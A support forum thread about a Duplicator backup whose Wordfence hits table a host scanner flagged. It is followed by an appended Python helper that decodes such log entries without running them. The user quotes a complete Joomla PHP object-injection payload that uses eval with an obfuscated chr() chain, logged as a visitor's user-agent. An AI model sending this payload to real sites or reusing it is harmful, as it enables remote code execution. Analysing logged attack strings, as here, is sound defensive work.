Hey @philrp,
Can you provide more details as to why Wordfence thought the code to be malicious? If you have sensitive info to share, just submit a ticket and refer to this thread.
Thanks
Thread Starter
philrp
(@philrp)
Hi,
Thank you for your response.
My hosting provider runs some form of malicious code scan on a regular basis.
The code they identified as malicious is the following, taken from the UA column of the wfHits table of Wordfence.
}__test|O:21:”JDatabaseDriverMysqli”:3:{s:2:”fc”;O:17:”JSimplepieFactory”:0:{}s:21:”\0\0\0disconnectHandlers”;a:1:{i:0;a:2:{i:0;O:9:”SimplePie”:5:{s:8:”sanitize”;O:20:”JDatabaseDriverMysql”:0:{}s:8:”feed_url”;s:119:”eval(chr(112).chr(104).chr(112).chr(105).chr(110).chr(102).chr(111).chr(40).chr(41).chr(59));Factory::getConfig();exit”;s:19:”cache_name_function”;s:6:”assert”;s:5:”cache”;b:1;s:11:”cache_class”;O:20:”JDatabaseDriverMysql”:0:{}}i:1;s:4:”init”;}}s:13:”\0\0\0connection”;b:1;}????
According to the Wordfence person in their forum, wfHits stores referrers, user-agents and other data that any site visitor or attacker can modify.
My first thought was to tell Duplicator to exclude the wfHits table, but wouldn’t that break Wordfence on restore or clone?
According to my hosting company, the SQL file within the ZIP file would not raise an issue, hence my question about possibly preventing (or removing) the separate SQL file?
Thanks for such a great tool and support.
Phil
Hey Phil,
That section of code doesn’t look to be problematic to me in its current context. Sometimes scanners can have false flags. There is an overview of it in this FAQ.
– A scanner says that a security issue/malware/threat was detected. Is this valid?
– https://snapcreek.com/duplicator/docs/faqs-tech/#faq-trouble-070-q
Hope this helps~
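An added example, not part of the original thread and not Duplicator or Wordfence code: a small triage helper for a flagged wfHits user-agent value. It lists the PHP serialized-object class names in the string and decodes any chr() chains to plain text, without executing anything. The function names and the abridged sample string are assumptions made for illustration.

```python
import re

# PHP serialized-object header: O:<len>:"<Class>":<count>:{
# Curly quotes are accepted too, because exports and forum software often convert them.
OBJ_RE = re.compile(
    r'O:\d+:["\u201c\u201d]([A-Za-z_\\][\w\\]*)["\u201c\u201d]:\d+:\{'
)
CHR_CHAIN_RE = re.compile(r'chr\(\d+\)(?:\.chr\(\d+\))+')
CHR_RE = re.compile(r'chr\((\d+)\)')


def decode_chr_chains(text):
    """Return the plaintext of every chr(N).chr(N)... chain found in text."""
    decoded = []
    for chain in CHR_CHAIN_RE.finditer(text):
        codes = [int(n) for n in CHR_RE.findall(chain.group(0))]
        decoded.append(''.join(chr(c) for c in codes if c < 0x110000))
    return decoded


def triage_user_agent(ua):
    """Summarise what a logged user-agent string contains; nothing is evaluated."""
    classes = OBJ_RE.findall(ua)
    return {
        "serialized_objects": classes,         # class names the request referenced
        "decoded_chr": decode_chr_chains(ua),  # what the obfuscated part spells out
        "suspicious": bool(classes),           # browsers never send serialized objects
    }


# Constructed sample: an abridged form of the string quoted in the thread.
SAMPLE_UA = (
    '}__test|O:21:"JDatabaseDriverMysqli":3:{s:2:"fc";'
    'O:17:"JSimplepieFactory":0:{}s:8:"feed_url";s:119:"eval('
    'chr(112).chr(104).chr(112).chr(105).chr(110).chr(102).chr(111)'
    '.chr(40).chr(41).chr(59));"}'
)

if __name__ == "__main__":
    for key, value in triage_user_agent(SAMPLE_UA).items():
        print(f"{key}: {value}")
```

Run against the rows a scanner flagged, the output shows which classes the logged request named and what the chr() sequence decodes to, which helps decide whether the hit is logged attack traffic held as table data or something that needs further investigation.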